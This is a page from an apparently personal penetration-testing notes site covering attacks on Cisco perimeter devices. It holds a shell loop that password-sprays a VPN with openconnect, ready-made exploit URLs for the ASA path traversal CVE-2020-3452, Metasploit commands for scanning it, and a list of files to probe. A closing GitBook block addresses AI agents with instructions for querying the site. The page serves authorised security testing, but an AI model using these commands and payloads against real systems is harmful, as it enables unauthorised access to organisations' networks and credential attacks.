> For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ppn.snovvcra.sh/pentest/perimeter/cisco.md). # Cisco ## Brute Force Authentication * Manually in a dirty way: ``` $ for user in `cat users.txt`; do echo 'Passw0rd!' | sudo openconnect vpn.contoso.com --user=$user --passwd-on-stdin --servercert=pin-sha256: | tee -a openconnect.log; done ``` ## ASA Path Traversal **CVE-2020-3452** Check manually: ``` https://cisco.example.com/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua https://cisco.example.com/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ ``` Check with MSF: ``` msf > use auxiliary/scanner/http/cisco_directory_traversal msf > set RHOSTS file:cisco.txt msf > run ``` Potentially existent files to prove the vulnerability: ``` apcf app_index.html appstart.js appstatus ask.html auth.html blank.html ced.html cedf.html cedhelp.html cedlogon.html cedmain.html cedportal.html cedsave.html clear_cache color_picker.html color_picker.js common.js commonspawn.js connection_failed_form cookie custom do_url files gp-gip.html help home http_auth.html include lced.html localization_inc.lua logo.gif logon.html logon_custom.css logon_forms.js logon_redirect.html logout.html no_svc.html noportal.html nostcaccess.html ping.html pluginlib.js portal.css portal.html portal.js portal_ce.html portal_custom.css portal_elements.html portal_forms.js portal_img portal_inc.lua preview.html relayjar.html relaymonjar.html relaymonocx.html relayocx.html sdesktop sess_update.html session.js session_expired session_password.html shshim svc.html test_chargen tlbr tunnel_linux.jnlp tunnel_mac.jnlp ucte_forbidden_data ucte_forbidden_url user_dialog.html useralert.html win.js wrong_url.html ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://ppn.snovvcra.sh/pentest/perimeter/cisco.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.